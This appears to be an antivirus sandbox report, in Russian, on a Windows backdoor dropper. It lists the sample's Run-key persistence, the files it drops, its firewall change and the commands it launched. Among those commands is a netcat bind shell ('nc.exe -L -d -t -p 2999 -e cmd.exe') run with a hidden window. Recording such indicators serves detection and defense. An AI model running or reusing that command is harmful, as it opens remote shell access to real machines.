Техническая информация
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] 'Backdoor' = '"<SYSTEM32>\backdoor.exe"'
- %TEMP%\ixp000.tmp\backdoor.exe
- %TEMP%\ixp000.tmp\backdoor.reg
- %TEMP%\ixp000.tmp\nc.exe
- %TEMP%\ixp000.tmp\start.bat
- %WINDIR%\syswow64\nc.exe
- %WINDIR%\syswow64\backdoor.exe
- %TEMP%\ixp000.tmp\start.bat
- %TEMP%\ixp000.tmp\nc.exe
- %TEMP%\ixp000.tmp\backdoor.reg
- %TEMP%\ixp000.tmp\backdoor.exe
- ClassName: 'RegEdit_RegEdit' WindowName: ''
- '%TEMP%\ixp000.tmp\backdoor.exe'
- '%TEMP%\ixp000.tmp\nc.exe' -L -d -t -p 2999 -e cmd.exe
- '%TEMP%\ixp000.tmp\backdoor.exe' (со скрытым окном)
- '%TEMP%\ixp000.tmp\nc.exe' -L -d -t -p 2999 -e cmd.exe (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c start.bat cmd.exe (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c start.bat cmd.exe
- '%WINDIR%\syswow64\regedit.exe' /S backdoor.reg
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%TEMP%\ixp000.tmp\nc.exe"